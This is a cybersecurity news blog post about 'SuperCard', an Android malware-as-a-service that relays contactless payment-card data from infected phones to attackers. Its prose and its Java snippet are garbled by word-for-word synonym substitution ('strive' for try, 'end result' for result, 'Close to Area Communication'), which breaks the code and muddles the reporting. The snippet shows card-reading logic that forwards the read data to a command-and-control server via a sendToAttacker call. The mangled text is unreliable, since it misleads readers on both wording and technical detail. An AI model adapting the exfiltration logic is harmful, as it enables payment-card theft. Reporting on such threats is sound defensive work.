Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

New SuperCard Malware Using Hacked Android Phones to Relay Data from Users Payment Cards to Attackers Device

Posted on June 18, 2025June 18, 2025 By CWS

In a regarding growth for cell fee safety, cybersecurity consultants have recognized a complicated new malware pressure named “SuperCard” that exploits Android units to steal fee card information.

This malicious software, a modified model of the reliable NFCGate program, intercepts Close to Area Communication (NFC) visitors throughout contactless funds, successfully turning compromised telephones into relay units that transmit delicate monetary data on to attackers.

First detected in April 2025 by Italian safety agency Cleafy, SuperCard initially focused European banking clients earlier than increasing its attain.

The malware operates as a part of a well-organized “malware-as-a-service” (MaaS) platform referred to as SuperCard X, which cybercriminals can subscribe to by means of underground Telegram channels.

In contrast to earlier NFC-exploiting threats, SuperCard presents subscribers subtle buyer help companies, reflecting the more and more skilled nature of right this moment’s cybercrime ecosystem.

Habr researchers recognized that the assault begins with social engineering techniques, the place victims obtain messages from seemingly reliable sources urging them to put in what seems to be a helpful software.

As soon as put in, the malware requests permissions to entry the machine’s NFC module and fee techniques, establishing itself because the default fee handler.

// Simplified illustration of SuperCard’s NFC interception mechanism
@Override
public void onTagDiscovered(Tag tag) {
IsoDep isoDep = IsoDep.get(tag);
strive {
isoDep.join();
byte[] command = {0x00, 0xA4, 0x04, 0x00, 0x07, 0xA0, 0x00, 0x00, 0x00, 0x42, 0x10, 0x10};
byte[] end result = isoDep.transceive(command);
// Intercept and ahead card information to C2 server
sendToAttacker(end result);
} catch (Exception e) {
Log.e(“SuperCard”, “Error speaking with card”, e);
}
}

An infection Mechanism and Knowledge Exfiltration

The sophistication of SuperCard lies in its multi-stage an infection course of. After set up, the malware stays dormant till it detects a fee transaction.

When a consumer makes an attempt to make a contactless fee, SuperCard prompts within the background, capturing the transaction information whereas permitting the reliable fee to proceed.

This stealth strategy ensures victims stay unaware of the compromise whereas their card particulars are transmitted to command-and-control servers.

F6 safety analysts report that SuperCard has already compromised over 175,000 Android units in Russia alone, with damages exceeding 432 million rubles within the first quarter of 2025.

The malware’s fast world unfold demonstrates the evolving menace panorama for cell fee techniques, requiring customers to train excessive warning when putting in purposes, even those who seem reliable.

Energy up early menace detection, escalation, and mitigation with ANY.RUN’s Risk Intelligence Lookup. Get 50 trial searches.

Cyber Security News Tags:Android, Attackers, Cards, Data, Device, Hacked, Malware, Payment, Phones, Relay, SuperCard, Users

Post navigation

Previous Post: 5 New Trends In Phishing Attacks On Businesses 
Next Post: Insecure GitHub Actions in Open Source Projects MITRE and Splunk Exposes Critical Vulnerabilities

Related Posts

Cloud Security Essentials – Protecting Multi-Cloud Environments Cyber Security News
Understanding OWASP Top 10 – Mitigating Web Application Vulnerabilities Cyber Security News
Authorities Arrested 17 Criminal Bankers, EUR 4.5 Million Seized Cyber Security News
From SOC to SOAR Automating Security Operations Cyber Security News
New Blitz Malware Attacking Windows Servers to Deploy Monero Miner Cyber Security News
CISA Adds MDaemon Email Server XSS Vulnerability to KEV Catalog Following Exploitation Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • High-Severity Vulnerabilities Patched by Cisco, Atlassian
  • Password Reset Poisoning Attack Allows Account Takeover Using the Password Reset Link
  • Russian APT29 Exploits Gmail App Passwords to Bypass 2FA in Targeted Phishing Campaign
  • Golden SAML Attack Let Attackers Gains Control of The Private Keyused by Federation Server
  • Swedish Truck Giant Scania Investigating Hack

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • June 2025
  • May 2025

Recent Posts

  • High-Severity Vulnerabilities Patched by Cisco, Atlassian
  • Password Reset Poisoning Attack Allows Account Takeover Using the Password Reset Link
  • Russian APT29 Exploits Gmail App Passwords to Bypass 2FA in Targeted Phishing Campaign
  • Golden SAML Attack Let Attackers Gains Control of The Private Keyused by Federation Server
  • Swedish Truck Giant Scania Investigating Hack

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News